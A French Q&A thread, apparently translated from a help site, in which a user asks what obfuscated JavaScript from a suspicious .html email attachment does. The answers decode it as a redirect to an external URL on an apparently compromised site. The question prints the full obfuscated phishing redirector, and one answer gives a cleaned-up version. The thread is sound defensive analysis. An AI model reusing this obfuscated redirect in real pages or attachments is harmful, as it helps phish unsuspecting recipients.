Que fait ce code suspect d'hameçonnage?

Question

Quelques-uns de mes collègues non-IT ont ouvert une pièce jointe .html dans un message électronique qui semble extrêmement suspect. Il en résulte un écran vide lorsqu'il apparaît que du code javascript a été exécuté.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script> 

Qu'est-ce qu'il a fait? Cela dépasse la portée de mes connaissances en programmation.

Answer 1

Il redirigera vers un URL, 'http://lendermedia.com/images/z.htm' (suivez-le à vos risques et périls).

Copiez et collez le code dans un éditeur JavaScript de valeur et formatez-le pour vous.

Points clés:

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, ''); 

h égalera 'http://lendermedia.com/images/z.htm'

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')]; 

t contiendra une référence à document.location

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h; 

La propriété nommée href de b, qui à ce stade (à l'intérieur d'une autre fonction) est vraiment t de l'instruction ci-dessus, est définie sur h, qui est l'URL.

La plupart du code est simple bruit, la fonctionnalité réelle se compose de ceci:

function uK() { 
}; 
uK.prototype = { 
    f : function() { 
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^' 
     .replace(/[\^H\!9X]/g, ''); 
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')]; 
    function x(b) { 
     b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h; 
    } 
    x(t); 
    } 
}; 
var tL = new uK(); 
tL.f(); 

Answer 2

Moins le faux-fuyants, il fait quelque chose comme document.location.href="http://lendermedia.com/images/z.htm"

Answer 3

partie clé de comprendre ce code est le replace(/[\^H\!9X]/g, '') les pièces. Si le deuxième argument pour le remplacement est '', il s'agit simplement de supprimer des éléments de la chaîne précédente.

Façon vraiment inélégante de brouiller les choses. L'objectif est probablement d'être aléatoire pour chaque utilisateur et d'éviter les filtres anti-spam bayésiens.

Answer 4

J'ai rencontré le même problème, puis j'ai trouvé cette page. Après avoir fait un WHOIS pour les informations de contact, j'ai contacté le propriétaire de lendermedia.com, qui semblait avoir découvert que son site héberge la page z.htm sans sa connaissance et contre son gré. Au moment où je l'ai contacté, j'étais capable de parcourir son répertoire /images/. Il a depuis changé les permissions. Tout ça pour dire qu'il semble que ce type est propre, mais c'est à vous de décider.